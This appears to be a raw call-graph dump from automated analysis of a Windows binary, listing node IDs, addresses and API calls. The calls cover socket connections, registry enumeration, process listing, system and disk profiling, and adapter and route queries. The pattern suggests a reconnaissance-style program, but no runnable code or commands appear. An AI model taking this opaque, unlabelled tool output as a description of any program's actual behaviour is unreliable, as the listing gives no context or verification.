dd8f0 30 API calls 104485->104538 104489 dd872 104486->104489 104489->104456 104490 dd1f3 104555 e78f0 strlen memcpy 104490->104555 104493 dd4f9 104492->104493 104494 dd4b7 104492->104494 104496 dd504 104493->104496 104547 dd8f0 30 API calls 104493->104547 104539 dd8f0 30 API calls 104494->104539 104503 dd516 104496->104503 104548 dd8f0 30 API calls 104496->104548 104497 dd4ce 104506 dd4e3 104497->104506 104540 dd8f0 30 API calls 104497->104540 104500 dd51f 104501 dd52c 104500->104501 104550 dd8f0 30 API calls 104500->104550 104504 dd535 104501->104504 104551 dd8f0 30 API calls 104501->104551 104503->104500 104549 dd8f0 30 API calls 104503->104549 104519 dd53e 104504->104519 104552 dd8f0 30 API calls 104504->104552 104507 dd4f4 104506->104507 104541 dd8f0 30 API calls 104506->104541 104513 dd5bf 104507->104513 104542 dd8f0 30 API calls 104507->104542 104511 dd547 104517 dd1e8 104511->104517 104554 dd8f0 30 API calls 104511->104554 104518 dd5fb 104513->104518 104543 dd8f0 30 API calls 104513->104543 104516 dd87f 104516->104486 104556 dd8f0 30 API calls 104516->104556 104517->104486 104517->104490 104523 dd632 104518->104523 104544 dd8f0 30 API calls 104518->104544 104519->104511 104519->104516 104522 dd7fe 104519->104522 104553 dd8f0 30 API calls 104522->104553 104528 dd66e 104523->104528 104545 dd8f0 30 API calls 104523->104545 104526 dd8b6 104526->104486 104557 e78f0 strlen memcpy 104526->104557 104528->104517 104546 dd8f0 30 API calls 104528->104546 104529 dd8c5 104558 e7890 strlen 104529->104558 104533->104456 104535 de7db 104534->104535 104537 de7e2 104534->104537 104536 d4fe0 memset 104535->104536 104536->104537 104537->104456 104538->104517 104539->104497 104540->104506 104541->104507 104542->104513 104543->104518 104544->104523 104545->104528 104546->104517 104547->104496 104548->104503 104549->104500 104550->104501 104551->104504 104552->104519 104553->104511 104554->104517 104555->104489 104556->104526 104557->104529 104558->104517 104559 eb180 104561 eb19b 104559->104561 104581 eb2e3 104559->104581 104560 eb3e8 _assert 104562 eb41d 104560->104562 104590 eb473 104560->104590 104561->104560 104565 eb315 qsort 104561->104565 104569 eb2f0 WSAGetLastError 104561->104569 104575 eb2a9 getsockname 104561->104575 104577 eb020 closesocket 104561->104577 104561->104581 104591 eaf30 104561->104591 104595 eb060 104561->104595 104563 eb433 104562->104563 104605 eb590 htonl 104562->104605 104606 eb590 htonl 104563->104606 104565->104581 104568 eb43f 104573 eb456 104568->104573 104607 eb590 htonl 104568->104607 104569->104561 104569->104581 104608 eb590 htonl 104573->104608 104574 eb468 104576 eb4b1 104574->104576 104574->104590 104609 eb660 htonl 104574->104609 104600 eb020 104575->104600 104610 eb660 htonl 104576->104610 104577->104561 104582 eb4be 104583 eb4d5 104582->104583 104611 eb660 htonl 104582->104611 104612 eb660 htonl 104583->104612 104586 eb4e8 104586->104590 104613 eb770 htonl 104586->104613 104588 eb51d 104614 eb770 htonl 104588->104614 104592 eaf4c 104591->104592 104593 eaf63 socket 104591->104593 104592->104593 104594 eaf52 104592->104594 104593->104561 104594->104561 104597 eb080 104595->104597 104596 eb0b0 connect 104598 eb0bf WSAGetLastError 104596->104598 104597->104596 104597->104598 104599 eb0ea 104597->104599 104598->104597 104598->104599 104599->104561 104601 eb029 104600->104601 104602 eb052 104600->104602 104603 eb04b closesocket 104601->104603 104604 eb03e 104601->104604 104602->104561 104603->104602 104604->104561 104605->104563 104606->104568 104607->104573 104608->104574 104609->104576 104610->104582 104611->104583 104612->104586 104613->104588 104614->104590 104615 4f6400 104616 4f640b 104615->104616 104617 4f6420 104615->104617 104616->104617 104620 4f6430 104616->104620 104619 4f6416 104621 4f643d 104620->104621 104622 4f64a0 104621->104622 104623 4f6450 104621->104623 104636 4f34d0 free 104622->104636 104625 4f6488 104623->104625 104626 4f6455 104623->104626 104627 4f6465 104625->104627 104628 4f648f free 104625->104628 104626->104627 104635 4fa3a0 free 104626->104635 104632 4fb080 104627->104632 104628->104627 104633 4fb08c free 104632->104633 104634 4f6470 free 104632->104634 104633->104634 104634->104619 104637 4fa680 calloc 104638 4fa6a5 calloc 104637->104638 104640 4fa6c0 104637->104640 104639 4fa71c free 104638->104639 104638->104640 104639->104640 104641 3b8d6a LoadLibraryA 104642 3b9070 __acrt_iob_func fwrite 104641->104642 104643 3b8dc0 GetProcAddress GetProcAddress 104641->104643 104644 3b9001 104642->104644 104645 3b90a8 __acrt_iob_func fwrite FreeLibrary 104643->104645 104646 3b8dfe 104643->104646 104647 3b91f2 104644->104647 104648 3b9012 104644->104648 104645->104644 104646->104645 104652 3b8e06 104646->104652 104655 3a8f70 104647->104655 104651 3b8fc8 __acrt_iob_func fwrite FreeLibrary 104651->104644 104652->104651 104653 3b90f0 __acrt_iob_func fwrite FreeLibrary 104652->104653 104654 3b8e8c 104652->104654 104653->104644 104654->104651 104662 3a8e90 _open 104655->104662 104657 3a8f82 104658 3a8e90 8 API calls 104657->104658 104659 3a8fa2 104658->104659 104660 3a8f70 8 API calls 104659->104660 104661 3a8fb8 __acrt_iob_func fwrite 104660->104661 104664 3a8eba 104662->104664 104663 3a8ef3 _exit 104663->104664 104664->104663 104665 3a8f39 _write 104664->104665 104666 4fdfc0 104664->104666 104667 3a8f53 _close 104664->104667 104665->104664 104665->104667 104668 4fdfda CryptAcquireContextA 104666->104668 104669 4fdfd9 104666->104669 104667->104664 104670 4fe029 CryptGenRandom 104668->104670 104671 4fe011 104668->104671 104669->104657 104672 4fe04d 104670->104672 104673 4fe056 CryptReleaseContext 104670->104673 104671->104657 104672->104673 104674 4fe06d CryptReleaseContext 104672->104674 104673->104671 104674->104671 104675 22f17 104685 22f2c 104675->104685 104676 231d3 104679 2315c RegEnumKeyExA 104680 231b2 RegCloseKey 104679->104680 104679->104685 104680->104685 104681 21619 30 API calls 104682 23046 RegOpenKeyExA 104681->104682 104683 23089 RegQueryValueExA 104682->104683 104682->104685 104684 2313b RegCloseKey 104683->104684 104683->104685 104684->104685 104685->104676 104685->104679 104685->104681 104685->104684 104686 21619 104685->104686 104689 3b1360 104686->104689 104688 21645 RegOpenKeyExA 104688->104685 104690 3b1379 104689->104690 104691 3b13b0 104689->104691 104696 3ad1d0 _errno 104690->104696 104693 3ad1d0 30 API calls 104691->104693 104695 3b13d0 104693->104695 104694 3b1398 104694->104688 104695->104688 104704 3ad3ae 104696->104704 104705 3ad287 104696->104705 104697 3ad340 fputc 104697->104705 104698 3ab640 fputc 104698->104705 104699 3ad504 localeconv 104707 3b78b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 104699->104707 104701 3ac9c0 26 API calls 104701->104705 104703 3aca50 27 API calls 104703->104705 104704->104694 104705->104697 104705->104698 104705->104699 104705->104701 104705->104703 104705->104704 104706 3acc90 10 API calls 104705->104706 104708 3ab6a0 fputc fputc WideCharToMultiByte _errno 104705->104708 104706->104705 104707->104705 104708->104705 104709 58b50 104710 58b6b 104709->104710 104749 58be6 104709->104749 104711 58bf3 104710->104711 104712 58b8f 104710->104712 104710->104749 104750 5a550 104711->104750 104867 36e40 11 API calls 104712->104867 104715 58ba1 104717 58cd9 SleepEx getsockopt 104715->104717 104719 58c99 104715->104719 104737 58bb5 104715->104737 104720 58d22 104717->104720 104721 58d18 WSAGetLastError 104717->104721 104718 58ccf 104722 58e85 104718->104722 104726 5a150 73 API calls 104718->104726 104718->104749 104719->104717 104723 58cb2 104719->104723 104720->104718 104728 58d43 104720->104728 104721->104720 104729 58eae 104722->104729 104722->104749 104874 32a00 48 API calls 104722->104874 104723->104718 104869 5b180 SleepEx getsockopt WSAGetLastError 104723->104869 104724 58c35 WSAGetLastError 104854 5a150 104724->104854 104725 58c1f connect 104725->104724 104730 58dff WSASetLastError 104726->104730 104733 3d8c0 2 API calls 104728->104733 104729->104749 104875 278b0 closesocket 104729->104875 104730->104722 104735 58e1b 104730->104735 104738 58d4d 104733->104738 104735->104722 104872 3d090 64 API calls 104735->104872 104736 58c8b 104736->104719 104741 58dc8 104736->104741 104745 58d66 104737->104745 104737->104749 104740 5a150 73 API calls 104738->104740 104740->104745 104871 5b100 66 API calls 104741->104871 104742 58e67 104873 64fd0 49 API calls 104742->104873 104745->104749 104870 650a0 49 API calls 104745->104870 104751 3d8c0 2 API calls 104750->104751 104752 5a575 104751->104752 104754 5a597 104752->104754 104880 275e0 104752->104880 104851 5a6d9 104754->104851 104893 5ef30 104754->104893 104755 5a709 104757 278b0 49 API calls 104755->104757 104775 5a713 104755->104775 104757->104775 104758 58bfc 104758->104718 104758->104724 104758->104725 104758->104749 104760 5a63a 104761 5a641 104760->104761 104762 5a69b _errno _errno _errno 104760->104762 104764 5a650 setsockopt 104761->104764 104767 5a683 104761->104767 104901 3d090 64 API calls 104762->104901 104766 5a7e5 104764->104766 104764->104767 104765 5a6c9 104902 64f40 50 API calls 104765->104902 104771 5a8ee 104766->104771 104772 5a802 104766->104772 104767->104766 104905 64fd0 49 API calls 104767->104905 104777 5a962 getsockopt 104771->104777 104778 5a92a 104771->104778 104800 5a9ac 104771->104800 104773 5a811 setsockopt 104772->104773 104774 5a87c 104772->104774 104773->104774 104779 5a83b 104773->104779 104776 5ac6a 104774->104776 104782 5ac20 getsockopt 104774->104782 104783 5a8b9 104774->104783 104775->104758 104904 650a0 49 API calls 104775->104904 104776->104800 104910 5b1e0 56 API calls 104776->104910 104780 5a984 104777->104780 104781 5a991 setsockopt 104777->104781 104909 47620 11 API calls 104778->104909 104779->104774 104790 5a854 WSAGetLastError 104779->104790 104780->104781 104780->104800 104781->104800 104785 5ac42 104782->104785 104786 5ac4f setsockopt 104782->104786 104908 47620 11 API calls 104783->104908 104785->104776 104785->104786 104786->104776 104789 5a945 104789->104777 104794 5a94c 104789->104794 104906 3d090 64 API calls 104790->104906 104792 5af41 104900 867e0 ioctlsocket 104792->104900 104793 5a8d4 104793->104782 104797 5a8df 104793->104797 104794->104800 104795 5a86d 104907 64fd0 49 API calls 104795->104907 104797->104776 104799 5af56 104801 5af5d 104799->104801 104802 5afb9 WSAGetLastError 104799->104802 104800->104792 104803 5abe1 104800->104803 104804 5ab0a strlen 104800->104804 104800->104851 104801->104775 104805 5a150 73 API calls 104801->104805 104802->104851 104806 5aed3 htons 104803->104806 104807 5abee 104803->104807 104804->104803 104813 5ab22 104804->104813 104808 5af8f 104805->104808 104809 5aeeb bind 104806->104809 104807->104809 104810 5abf9 htons 104807->104810 104812 3d8c0 2 API calls 104808->104812 104819 5af03 104809->104819 104820 5afcf 104809->104820 104811 5ac0c 104810->104811 104811->104809 104812->104775 104815 5abb9 104813->104815 104817 5ae32 104813->104817 104818 5acb8 104813->104818 104814 5af33 104814->104792 104823 5adc5 104815->104823 104824 5ad45 104815->104824 104828 5adea WSAGetLastError 104815->104828 104912 56be0 112 API calls 104815->104912 104816 5b056 WSAGetLastError 104921 3d090 64 API calls 104816->104921 104817->104815 104917 64fd0 49 API calls 104817->104917 104818->104815 104834 5acdc WSAGetLastError 104818->104834 104818->104851 104819->104814 104919 64fd0 49 API calls 104819->104919 104820->104816 104825 5aff8 htons bind 104820->104825 104920 64fd0 49 API calls 104820->104920 104829 5ae8e 104823->104829 104830 5aeb8 104823->104830 104823->104851 104832 5ade6 104824->104832 104844 5ad5f 104824->104844 104825->104819 104825->104820 104826 5b07b 104922 64f40 50 API calls 104826->104922 104915 3d090 64 API calls 104828->104915 104829->104809 104837 5ae93 strchr 104829->104837 104918 845c0 12 API calls 104830->104918 104832->104828 104911 3d090 64 API calls 104834->104911 104842 5aead 104837->104842 104839 5b08b 104839->104851 104841 5ad01 104916 64f40 50 API calls 104841->104916 104923 845c0 12 API calls 104842->104923 104843 5aecc 104843->104806 104843->104809 104845 5adb7 104844->104845 104913 64fd0 49 API calls 104844->104913 104914 73030 48 API calls 104845->104914 104850 5b0bf 104850->104811 104852 5b0ca htons 104850->104852 104851->104755 104851->104775 104903 32a00 48 API calls 104851->104903 104852->104811 104853 5b0e5 strtoul 104852->104853 104853->104811 104855 5a15f 104854->104855 104857 58c4d 104854->104857 104856 5a181 getsockname 104855->104856 104855->104857 104858 5a1f7 104856->104858 104859 5a1d0 WSAGetLastError 104856->104859 104857->104736 104868 650a0 49 API calls 104857->104868 104861 5ef30 49 API calls 104858->104861 104928 3d090 64 API calls 104859->104928 104863 5a20f 104861->104863 104862 5a1eb 104930 64f40 50 API calls 104862->104930 104863->104857 104864 5a216 _errno _errno 104863->104864 104929 3d090 64 API calls 104864->104929 104867->104715 104868->104736 104869->104718 104870->104749 104871->104718 104872->104742 104873->104722 104874->104729 104876 278c5 104875->104876 104877 278dc 104875->104877 104931 272a0 48 API calls 104876->104931 104877->104749 104879 278d7 104879->104877 104881 27607 socket 104880->104881 104882 275ef 104880->104882 104883 2762b 104881->104883 104884 2763f 104881->104884 104882->104881 104885 27643 104882->104885 104886 27601 104882->104886 104924 272a0 48 API calls 104883->104924 104884->104754 104925 272a0 48 API calls 104885->104925 104886->104881 104888 2763a 104888->104884 104890 27654 __acrt_iob_func 104926 2cb20 76 API calls 104890->104926 104892 27674 fflush _errno 104892->104754 104894 5efa8 104893->104894 104898 5ef47 104893->104898 104895 5efc0 104894->104895 104927 2c960 47 API calls 104894->104927 104895->104760 104897 5ef66 _errno 104897->104760 104898->104897 104899 5ef96 htons 104898->104899 104899->104895 104900->104799 104901->104765 104902->104851 104903->104755 104904->104758 104905->104766 104906->104795 104907->104774 104908->104793 104909->104789 104910->104800 104911->104841 104912->104824 104913->104845 104914->104823 104915->104841 104916->104851 104917->104815 104918->104843 104919->104814 104920->104820 104921->104826 104922->104839 104923->104850 104924->104888 104925->104890 104926->104892 104927->104895 104928->104862 104929->104862 104930->104857 104931->104879 104932 231d7 CreateToolhelp32Snapshot 104933 23223 104932->104933 104936 23200 104932->104936 104934 23232 Process32First 104933->104934 104935 232dc CloseHandle 104934->104935 104937 23255 104934->104937 104935->104936 104938 232bc Process32Next 104937->104938 104938->104935 104938->104937 104939 23d5e 104940 23d30 104939->104940 104940->104939 104942 23d90 104940->104942 104943 30ab0 104940->104943 104946 305b0 104943->104946 104947 307c7 104946->104947 104951 305bd 104946->104951 104947->104940 104948 3066a 104960 306f0 104948->104960 104961 307ce 104948->104961 105003 373b0 81 API calls 104948->105003 104951->104947 104951->104948 104951->104961 105001 303c0 50 API calls 104951->105001 105002 37450 81 API calls 104951->105002 104952 307ef 104978 33000 104952->104978 104956 3075f getsockopt 104956->104960 104957 30707 WSAEventSelect 104957->104960 104957->104961 104958 30802 104959 30a2f 104958->104959 104962 30861 WSAWaitForMultipleEvents 104958->104962 104982 36fa0 104958->104982 104959->104961 105005 32f10 QueryPerformanceCounter GetTickCount 104959->105005 104960->104952 104960->104956 104960->104957 104964 276a0 82 API calls 104960->104964 105004 37380 48 API calls 104961->105004 104971 30854 104962->104971 104964->104960 104967 30a19 WSAResetEvent 104967->104959 104968 30a6b 104968->104961 104970 30a87 104968->104970 104969 308c8 WSAEnumNetworkEvents 104969->104971 105006 36df0 Sleep WSASetLastError 104970->105006 104971->104969 104973 30928 WSAEventSelect 104971->104973 104977 30970 104971->104977 104973->104971 104974 30a94 104974->104961 104975 309e8 WSAEnumNetworkEvents 104976 309d0 WSAEventSelect 104975->104976 104975->104977 104976->104975 104976->104977 104977->104967 104977->104975 104977->104976 104979 33018 104978->104979 104981 33031 104978->104981 104980 3d8c0 2 API calls 104979->104980 104979->104981 104980->104981 104981->104958 104983 36fd4 104982->104983 104984 36feb 104982->104984 104983->104984 104996 3701b 104983->104996 104985 30847 104984->104985 104986 37186 WSASetLastError 104984->104986 104987 36fff Sleep 104984->104987 104985->104961 104985->104962 104985->104971 104986->104985 104987->104985 104988 37176 104991 37207 select 104988->104991 104989 371aa 104990 3730b 104989->104990 104993 37331 WSASetLastError 104989->104993 104994 371cc Sleep 104989->104994 104990->104985 104992 37312 WSAGetLastError 104990->104992 104991->104990 105000 37233 104991->105000 104992->104985 104993->104985 104993->104990 104994->104985 104995 371ec 104994->104995 104995->104992 104996->104988 104996->104989 104997 3726b __WSAFDIsSet 104998 3729a __WSAFDIsSet 104997->104998 104997->105000 104999 372ba __WSAFDIsSet 104998->104999 104998->105000 104999->105000 105000->104985 105000->104997 105000->104998 105000->104999 105001->104951 105002->104951 105003->104948 105004->104947 105005->104968 105006->104974 105007 d7e10 105008 d7e4e 105007->105008 105012 d7e3d 105007->105012 105013 e43d0 105008->105013 105010 d7e7b 105010->105012 105023 d8b50 105010->105023 105014 e43e7 105013->105014 105021 e4424 105013->105021 105047 d40f0 strlen 105014->105047 105016 e43f7 105016->105021 105048 e2cb0 memset 105016->105048 105018 e441d 105018->105021 105049 e2f90 strlen memcpy 105018->105049 105020 e448d 105020->105021 105050 e3210 strlen memcpy 105020->105050 105021->105010 105024 d8b60 105023->105024 105026 d8b88 105024->105026 105051 e8e70 105024->105051 105056 e88b0 QueryPerformanceFrequency QueryPerformanceCounter 105026->105056 105028 d8b9a 105046 d8c32 105028->105046 105058 d7820 105028->105058 105030 d8bc6 105030->105046 105065 e4530 105030->105065 105032 d8c2b 105033 d8cb5 105032->105033 105032->105046 105094 d8db0 13 API calls 105032->105094 105034 de7c0 memset 105033->105034 105035 d8cf2 105034->105035 105042 d8d40 105035->105042 105072 de600 105035->105072 105037 d8d83 105037->105033 105039 d8d8d 105037->105039 105095 d6e90 memset memset 105039->105095 105041 d8d1a 105076 d6050 105041->105076 105093 d6e90 memset memset 105042->105093 105046->105012 105047->105016 105048->105018 105049->105020 105050->105021 105052 e8ea7 105051->105052 105053 e8e80 105051->105053 105052->105024 105096 e8d60 9 API calls 105053->105096 105055 e8e95 105055->105052 105057 e88f2 105056->105057 105057->105028 105059 d784c 105058->105059 105061 d78bc 105058->105061 105060 d78c0 105059->105060 105059->105061 105063 d7877 105059->105063 105060->105061 105098 df400 memset memset 105060->105098 105061->105030 105063->105061 105097 df400 memset memset 105063->105097 105066 e455e 105065->105066 105067 e4579 105065->105067 105099 e4c20 memmove strlen 105066->105099 105067->105032 105069 e4572 105069->105067 105100 e17d0 memset memmove memcpy strlen memcpy 105069->105100 105071 e458e 105071->105032 105073 de60d 105072->105073 105074 d8d13 105072->105074 105073->105074 105101 ecd70 memset 105073->105101 105074->105041 105074->105042 105077 d60d9 105076->105077 105102 eaa30 105077->105102 105081 d64a4 105141 df400 memset memset 105081->105141 105083 d64c7 105084 d6506 105083->105084 105085 d68df 105083->105085 105142 ec320 QueryPerformanceFrequency QueryPerformanceCounter 105084->105142 105088 d6050 58 API calls 105085->105088 105087 d6515 105143 df400 memset memset 105087->105143 105089 d68d2 105088->105089 105089->105046 105091 d652f 105144 e8880 WakeAllConditionVariable 105091->105144 105094->105037 105096->105055 105097->105063 105098->105060 105099->105069 105100->105071 105101->105074 105103 eaa5f 105102->105103 105104 d62fc 105103->105104 105145 de730 105103->105145 105140 d6d50 40 API calls 105104->105140 105107 eaabf 105109 eaacd htons 105107->105109 105114 eab0e 105107->105114 105108 eab18 htons 105110 eab58 105108->105110 105109->105110 105111 eab96 socket 105110->105111 105112 eab75 105110->105112 105111->105112 105111->105114 105113 eabd0 ioctlsocket 105112->105113 105112->105114 105130 ead2e 105112->105130 105115 eabef setsockopt 105113->105115 105116 eac10 105113->105116 105114->105104 105120 eae6e closesocket 105114->105120 105115->105114 105115->105116 105117 eac16 setsockopt 105116->105117 105118 eac37 105116->105118 105117->105114 105117->105118 105119 eac7a 105118->105119 105121 ead04 105118->105121 105123 eac57 htonl 105118->105123 105122 eace7 setsockopt 105119->105122 105125 eac9d 105119->105125 105120->105104 105126 ead0a setsockopt 105121->105126 105121->105130 105122->105121 105127 eacc6 bind 105123->105127 105124 eada0 connect 105128 eadb3 WSAGetLastError 105124->105128 105125->105127 105126->105114 105126->105130 105127->105114 105129 eacdd 105127->105129 105128->105114 105128->105130 105129->105121 105129->105122 105130->105114 105130->105124 105130->105128 105131 eade1 105130->105131 105131->105114 105148 eaf70 105131->105148 105134 eaeaf 105151 de760 memset 105134->105151 105135 eae9f 105136 de7c0 memset 105135->105136 105138 eaea6 105136->105138 105138->105114 105152 de180 memset 105138->105152 105140->105081 105141->105083 105142->105087 105143->105091 105144->105089 105146 d4fe0 memset 105145->105146 105147 de737 105146->105147 105147->105107 105147->105108 105147->105114 105149 eae21 105148->105149 105150 eaf93 getsockname 105148->105150 105149->105114 105149->105134 105149->105135 105150->105149 105151->105138 105152->105114 105153 2255d 105154 3a9f70 105153->105154 105155 2256c GetSystemInfo 105154->105155 105156 22589 105155->105156 105157 225a0 GlobalMemoryStatusEx 105156->105157 105158 225ec 105157->105158 105159 22603 GetLogicalDriveStringsA 105158->105159 105160 22626 105159->105160 105162 22762 105159->105162 105161 2263c GetDriveTypeA 105160->105161 105160->105162 105163 22743 strlen 105160->105163 105161->105163 105164 22655 GetDiskFreeSpaceExA 105161->105164 105165 227d6 KiUserCallbackDispatcher 105162->105165 105163->105160 105164->105160 105164->105163 105166 227f8 105165->105166 105167 22842 SHGetKnownFolderPath wcscpy wcscat FindFirstFileW 105166->105167 105168 22906 FindNextFileW 105167->105168 105169 22928 105167->105169 105168->105168 105168->105169 105170 22954 K32EnumProcesses 105169->105170 105171 2297b 105170->105171 105172 1fcbc0 105173 1fcbce free 105172->105173 105174 1fcbcc 105172->105174 105174->105173 105175 3d5e0 105176 3d652 WSAStartup 105175->105176 105177 3d5f0 105175->105177 105179 3d670 105176->105179 105180 3d664 105176->105180 105187 3d690 92 API calls 105177->105187 105179->105177 105182 3d67c WSACleanup 105179->105182 105181 3d5fa 105183 3d606 GetProcAddress 105181->105183 105184 3d616 105181->105184 105183->105184 105188 47620 11 API calls 105184->105188 105186 3d636 QueryPerformanceFrequency 105187->105181 105188->105186 105189 1a47b0 105215 1fe5d0 strlen MultiByteToWideChar 105189->105215 105192 1a47df 105228 19d520 17 API calls 105192->105228 105193 1a4824 105229 1d7120 16 API calls 105193->105229 105196 1a47ed 105198 1a488d fclose 105196->105198 105202 1a47f8 105196->105202 105197 1a4829 105230 1d7220 16 API calls 105197->105230 105198->105202 105200 1a483a GetLastError 105231 1d7310 16 API calls 105200->105231 105203 1a4852 _errno 105204 1a486b 105203->105204 105205 1a4860 _errno 105203->105205 105232 1d7120 16 API calls 105204->105232 105205->105204 105206 1a4898 105205->105206 105234 1d7120 16 API calls 105206->105234 105208 1a4870 105233 1d7220 16 API calls 105208->105233 105211 1a489d 105235 1d7220 16 API calls 105211->105235 105212 1a4881 105236 1d7310 16 API calls 105212->105236 105216 1fe6b0 GetLastError 105215->105216 105221 1fe608 105215->105221 105217 1fe6bd MultiByteToWideChar 105216->105217 105218 1fe6e2 GetLastError 105216->105218 105217->105218 105217->105221 105219 1fe6f4 fopen 105218->105219 105220 1a47c4 strchr 105218->105220 105219->105220 105220->105192 105220->105193 105222 1fe622 MultiByteToWideChar 105221->105222 105222->105220 105223 1fe649 strlen MultiByteToWideChar 105222->105223 105223->105220 105224 1fe673 _wfopen 105223->105224 105224->105220 105225 1fe685 _errno 105224->105225 105226 1fe6a0 fopen 105225->105226 105227 1fe690 _errno 105225->105227 105226->105220 105227->105220 105227->105226 105228->105196 105229->105197 105230->105200 105231->105203 105232->105208 105233->105212 105234->105211 105235->105212 105236->105202 105237 d4720 105238 d4728 105237->105238 105239 d4733 105238->105239 105240 d4fe0 memset 105238->105240 105241 d4745 105240->105241 105242 d477d 105241->105242 105270 e85e0 memset InitializeCriticalSection InitializeConditionVariable DeleteCriticalSection 105241->105270 105244 d4765 105245 d476c 105244->105245 105271 e8a80 7 API calls 105244->105271 105267 d4878 105245->105267 105303 d30a0 24 API calls 105245->105303 105248 d4791 105248->105245 105272 ded80 memset 105248->105272 105249 d4774 105251 d47b0 105251->105245 105252 de730 memset 105251->105252 105253 d47c4 105252->105253 105253->105245 105273 de530 memset _time64 105253->105273 105255 d47d8 105255->105245 105274 ded80 memset 105255->105274 105257 d47f7 105257->105245 105275 de000 memset _time64 105257->105275 105259 d480f 105259->105245 105276 d5540 memset strlen memcpy 105259->105276 105261 d482e 105261->105245 105277 d7720 memset memset memset _time64 105261->105277 105263 d484f 105263->105245 105278 d9270 105263->105278 105265 d4860 105289 d4950 105265->105289 105268 d486a 105268->105245 105268->105267 105304 df5f0 15 API calls 105268->105304 105270->105244 105271->105248 105272->105251 105273->105255 105274->105257 105275->105259 105276->105261 105277->105263 105305 da440 105278->105305 105280 d92ab 105280->105265 105281 d9297 105281->105280 105382 e86d0 EnterCriticalSection 105281->105382 105283 d93d5 105383 e86f0 LeaveCriticalSection 105283->105383 105284 e78a0 2 API calls 105287 d936a 105284->105287 105285 d92f3 105285->105283 105285->105284 105285->105287 105287->105283 105288 d93b1 memcpy 105287->105288 105288->105283 105290 d4966 105289->105290 105291 d4a14 htonl 105290->105291 105299 d49b9 105290->105299 105301 d49db 105290->105301 105392 db590 7 API calls 105291->105392 105293 d49c5 105294 e78a0 2 API calls 105293->105294 105293->105301 105294->105301 105295 d4aa0 gethostname 105296 d4b35 strchr 105295->105296 105297 d4ab3 WSAGetLastError 105295->105297 105296->105293 105300 d4b4f 105296->105300 105297->105296 105297->105299 105299->105293 105299->105295 105299->105301 105300->105301 105302 e78a0 2 API calls 105300->105302 105301->105268 105302->105293 105303->105249 105304->105245 105306 da46b 105305->105306 105307 da4db 105306->105307 105310 da48b GetAdaptersAddresses 105306->105310 105338 dad14 105307->105338 105384 ecb10 GetVersionExA 105307->105384 105309 da9fa 105311 daa03 RegOpenKeyExA 105309->105311 105309->105338 105334 da4a6 105310->105334 105367 da53f 105310->105367 105312 daa27 RegQueryValueExA 105311->105312 105313 dab70 RegOpenKeyExA 105311->105313 105316 daacc RegQueryValueExA 105312->105316 105317 daa71 105312->105317 105314 dac34 RegOpenKeyExA 105313->105314 105315 dab90 RegQueryValueExA 105313->105315 105322 dacf8 RegOpenKeyExA 105314->105322 105323 dac54 RegQueryValueExA 105314->105323 105318 dac26 RegCloseKey 105315->105318 105319 dabd2 105315->105319 105320 dab0e 105316->105320 105321 dab66 RegCloseKey 105316->105321 105317->105316 105329 daa85 RegQueryValueExA 105317->105329 105318->105314 105319->105318 105335 dabe2 RegQueryValueExA 105319->105335 105320->105321 105337 dab1e RegQueryValueExA 105320->105337 105321->105313 105327 dad56 RegEnumKeyExA 105322->105327 105322->105338 105324 dacea RegCloseKey 105323->105324 105325 dac96 105323->105325 105324->105322 105325->105324 105345 daca6 RegQueryValueExA 105325->105345 105326 da87d qsort 105339 da520 105326->105339 105371 da8a0 105326->105371 105330 db15d RegCloseKey 105327->105330 105331 dad9b 105327->105331 105328 da4f3 GetAdaptersAddresses 105332 da505 105328->105332 105328->105367 105336 daab3 105329->105336 105330->105338 105333 dae16 RegOpenKeyExA 105331->105333 105332->105339 105344 da527 GetAdaptersAddresses 105332->105344 105342 daddf RegEnumKeyExA 105333->105342 105343 dae34 RegQueryValueExA 105333->105343 105334->105328 105334->105339 105340 dac0c 105335->105340 105341 dac1b 105335->105341 105336->105316 105346 dab4c 105337->105346 105347 dab5b 105337->105347 105338->105281 105339->105307 105388 db830 26 API calls 105339->105388 105390 db1e0 strlen strncat strlen 105340->105390 105341->105318 105342->105333 105351 db155 105342->105351 105352 daf43 RegQueryValueExA 105343->105352 105368 dadbc 105343->105368 105344->105339 105344->105367 105353 dacdf 105345->105353 105354 dacd0 105345->105354 105389 db1e0 strlen strncat strlen 105346->105389 105347->105321 105349 da8f0 strcmp 105349->105371 105351->105330 105356 db052 RegQueryValueExA 105352->105356 105352->105368 105353->105324 105391 db1e0 strlen strncat strlen 105354->105391 105359 dadc7 RegCloseKey 105356->105359 105356->105368 105358 da794 GetBestRoute2 105361 dd190 34 API calls 105358->105361 105359->105342 105360 dae91 RegQueryValueExA 105360->105368 105361->105367 105362 dafa0 RegQueryValueExA 105362->105368 105363 db0af RegQueryValueExA 105363->105368 105364 da6c7 GetBestRoute2 105366 dd190 34 API calls 105364->105366 105365 da81e htons 105365->105367 105366->105367 105367->105326 105367->105339 105367->105358 105367->105364 105367->105365 105369 db180 30 API calls 105367->105369 105370 da746 htons 105367->105370 105368->105352 105368->105356 105368->105359 105368->105360 105368->105362 105368->105363 105375 e7890 strlen 105368->105375 105376 daf17 strlen 105368->105376 105377 daf26 strncat 105368->105377 105378 db035 strncat 105368->105378 105379 db026 strlen 105368->105379 105380 dadaa strncat 105368->105380 105381 db141 strlen 105368->105381 105369->105367 105370->105367 105371->105339 105371->105349 105372 e7890 strlen 105371->105372 105373 da991 strlen 105371->105373 105374 da8b0 strncat 105371->105374 105372->105371 105373->105374 105374->105371 105375->105368 105376->105377 105377->105368 105378->105368 105379->105378 105380->105368 105381->105380 105382->105285 105383->105280 105385 ecb6a GetVersionExA 105384->105385 105386 ecbbb 105384->105386 105385->105386 105387 ecbd2 105385->105387 105386->105309 105387->105309 105388->105307 105389->105347 105390->105341 105391->105353 105392->105299 105393 d70a0 105395 d70ae 105393->105395 105394 d717f WSAGetLastError 105396 d718b 105394->105396 105395->105394 105398 d71a7 105395->105398 105403 ea8c0 105395->105403 105407 d71c0 63 API calls 105395->105407 105396->105398 105408 d6d50 40 API calls 105396->105408 105400 d719f 105409 e9320 QueryPerformanceFrequency QueryPerformanceCounter closesocket 105400->105409 105404 ea8e6 105403->105404 105405 ea903 recvfrom 105403->105405 105404->105405 105406 ea8ed 105404->105406 105405->105406 105406->105395 105407->105395 105408->105400 105409->105398 105410 ea920 105411 ea944 105410->105411 105412 ea94b 105411->105412 105413 ea977 send 105411->105413 105414 4fb320 105415 3b1360 30 API calls 105414->105415 105416 4fb352 105415->105416 105417 4fb35e 105416->105417 105418 3a8f70 8 API calls 105416->105418 105419 4fb367 105418->105419 105420 3b1360 30 API calls 105419->105420 105421 4fb3a3 105420->105421 105422 